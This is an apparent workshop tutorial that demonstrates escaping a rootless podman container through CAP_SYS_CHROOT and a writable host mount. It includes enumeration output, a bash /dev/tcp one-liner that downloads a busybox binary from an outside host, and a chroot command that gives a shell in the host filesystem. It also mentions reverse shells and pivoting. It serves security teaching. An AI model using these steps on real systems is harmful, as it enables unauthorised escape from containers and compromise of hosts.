Container Escapes 101 - Privilege escalation
In this workshop, we’re going to explore escapes using chroot . This is a great way to cross the boundary between a container’s filesystem and the host’s filesystem.
This one starts with a story …
We have a question from the
<redacted>
Red Team that has been testing our systems for the past two weeks and I was wondering what your response would be. What they are asking:“Let’s say that a user that was given our same privileges and access was able to escalate their privileges to root or an admin, what could they have possibly done with that level privilege? Could they potentially “break out” and pivot to some other portion of the network?”
As far as I’m aware, there isn’t a possible path to become root/admin once the container is running as the nonroot user.
… and ends with a demonstration of how dangerously wrong that assumption is. 😈
Yeah … no
Privilege escalation works more or less the same in a container as it does on the host. The only marginally complex step running in a container adds is that you may not have a shell, or you may not have a way to run commands as root in the container. This means you may need to add an extra privesc on your way out … and that’s it. 🫠
Workshop setup
Our starting assumption is that we’ve gotten root access in our container, but the container runtime is running as a non-root user. This is the recommended setup in production, but it doesn’t mean that we can’t escalate privileges.
Open two SSH sessions to your VM. In one, let’s install podman
to run our container as a non-root user. While it’s possible to run Docker as a non-root user, it’d mess with our other workshops and for our workshop, podman
works just as well.
1
2
3
4
5
6
7
8
9
10
user@escapes:~$ sudo apt install podman -y
# # # lots of output # # #
user@escapes:~$ podman run -it -v /home/user:/mnt ubuntu:24.04
Resolved "ubuntu" as an alias (/etc/containers/registries.conf.d/shortnames.conf)
Trying to pull docker.io/library/ubuntu:24.04...
Getting image source signatures
Copying blob e3bd89a9dac5 done |
Copying config b24db5c17b done |
Writing manifest to image destination
root@62fd214d4ac8:/#
And in the second, verify that the podman
command is running as a non-root user.
1
2
3
4
5
user@escapes:~$ ps aux | grep podman
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
user 3259 0.1 1.0 1860624 41180 pts/0 Sl+ 01:26 0:03 podman run -it -v /home/user:/mnt ubuntu:24.04
user 3274 0.0 0.0 9192 2704 ? Ss 01:26 0:00 /usr/bin/conmon --api-version 1 -c 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b -u 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b -r /usr/bin/runc -b /home/user/.local/share/containers/storage/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata -p /run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/pidfile -n dreamy_shirley --exit-dir /run/user/1000/libpod/tmp/exits --full-attach -s -l journald --log-level warning --syslog --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/oci-log -t --conmon-pidfile /run/user/1000/containers/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /home/user/.local/share/containers/storage --exit-command-arg --runroot --exit-command-arg /run/user/1000/containers --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/user/1000/libpod/tmp --exit-command-arg --network-config-dir --exit-command-arg --exit-command-arg --network-backend --exit-command-arg netavark --exit-command-arg --volumepath --exit-command-arg /home/user/.local/share/containers/storage/volumes --exit-command-arg --db-backend --exit-command-arg sqlite --exit-command-arg --transient-store=false --exit-command-arg --runtime --exit-command-arg runc --exit-command-arg --storage-driver --exit-command-arg overlay --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg 62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b
user 3332 0.0 0.0 3552 1792 pts/1 S+ 02:07 0:00 grep --color=auto podman
Where we’re going
The exact same things we’ve been doing so far.
- ✅ became root in the container
- … find something on the host to read, write, or otherwise be valuable
- maybe escalate privileges on the host or pivot elsewhere
Looking around
Using what we learned before, let’s take a look around inside of our container.
❓ What user are we running as on the host?
hint
Look at the mounts listing, specifically theoverlay
mount.
example answer
root@62fd214d4ac8:/# cat /etc/mtab
overlay / overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
❓ What filesystems does your container see that could be interesting?
hint
Keep looking at/etc/mtab
for a shared mount, socket, or other fun thing.
example answer
root@62fd214d4ac8:/# cat /etc/mtab
overlay / overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
/dev/sda2 /mnt ext4 rw,relatime 0 0
/dev/sda2 /mnt/.local/share/containers/storage/overlay ext4 rw,relatime 0 0
overlay /mnt/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/merged overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
overlay /mnt/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/merged overlay rw,relatime,lowerdir=/home/user/.local/share/containers/storage/overlay/l/CZFEJ3VG7B6IWKDST56HMI7S5V,upperdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/diff,workdir=/home/user/.local/share/containers/storage/overlay/d1ca7afa75bc9ac3c8584418bfaa9452c8058729806d9b50dabbc1beb3451d70/work,redirect_dir=nofollow,uuid=on,userxattr 0 0
shm /mnt/.local/share/containers/storage/overlay-containers/62fd214d4ac8287e8602a56ed6d2aa7a0d661f06a5535d202dc25eff881a024b/userdata/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=64000k,uid=1000,gid=1000,inode64 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,uid=1000,gid=1000,inode64 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=100004,mode=620,ptmxmode=666 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /run/.containerenv tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/hostname tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/resolv.conf tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
tmpfs /etc/hosts tmpfs rw,nosuid,nodev,relatime,size=399432k,nr_inodes=99858,mode=700,uid=1000,gid=1000,inode64 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=64000k,uid=1000,gid=1000,inode64 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot 0 0
udev /dev/null devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/random devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/full devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/tty devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/zero devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /dev/urandom devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=100004,mode=620,ptmxmode=666 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
udev /proc/kcore devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/keys devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/latency_stats devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
udev /proc/timer_list devtmpfs rw,nosuid,relatime,size=1940504k,nr_inodes=485126,mode=755,inode64 0 0
tmpfs /proc/scsi tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
tmpfs /sys/firmware tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
tmpfs /sys/dev/block tmpfs ro,relatime,uid=1000,gid=1000,inode64 0 0
❓ What capabilities do I have?
hint
cat /proc/self/status | grep Cap
is probably a good place to start.
example answer
root@62fd214d4ac8:/# cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000800405fb
CapEff: 00000000800405fb
CapBnd: 00000000800405fb
CapAmb: 0000000000000000
Taking a look from the host to decode these capabilities, we see that we have the following:
user@escapes:~$ capsh --decode=00000000800405fb
0x00000000800405fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_sys_chroot,cap_setfcap
❓ Given all of the above, what seems like a reasonable next step?
hint
We haveCAP_SYS_CHROOT
and a writable mount somewhere in the host's root filesystem.
example answer
Make some mischief!!! 🙀Now let’s make some mischief
Now let’s start looking around on the host. We can use that mount, chroot into it, then explore.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# try to chroot into the host's filesystem
root@62fd214d4ac8:/# chroot /mnt/ /bin/bash
chroot: failed to run command '/bin/bash': No such file or directory
# now get a shell by grabbing a static binary over HTTP using the shell
root@62fd214d4ac8:/# export RHOST=files.some-fantastic.com
root@62fd214d4ac8:/# export RPORT=80
root@62fd214d4ac8:/# export LFILE=busybox-aarch64/busybox
root@62fd214d4ac8:/# bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > busybox'
# now make it executable
root@62fd214d4ac8:/# perl -e 'chmod 0755, "busybox"'
# and move it to position
root@62fd214d4ac8:/# cp busybox /mnt
# aaaaand go!
root@62fd214d4ac8:/# chroot /mnt/ ./busybox sh
/ #
🎉 A successful chroot! We now have a shell in the host filesystem, running as whatever user.
Our host system sees and confirms this process:
1
2
3
user@escapes:~$ ps aux | grep busybox
user 6206 0.0 0.0 2232 768 pts/0 S+ 03:48 0:00 ./busybox sh
user 6217 0.0 0.0 3552 1792 pts/1 S+ 04:09 0:00 grep --color=auto busybox
Oh no, what now?
The possibilities were endless! We could have opened a reverse shell, downloaded a different binary, or continued enumerating the host filesystem for goodies.
This maps to persistence , lateral movement , and/or privilege escalation , depending on what we chose to do. We have reasonably unrestricted access to the host from a container.
Back to the index.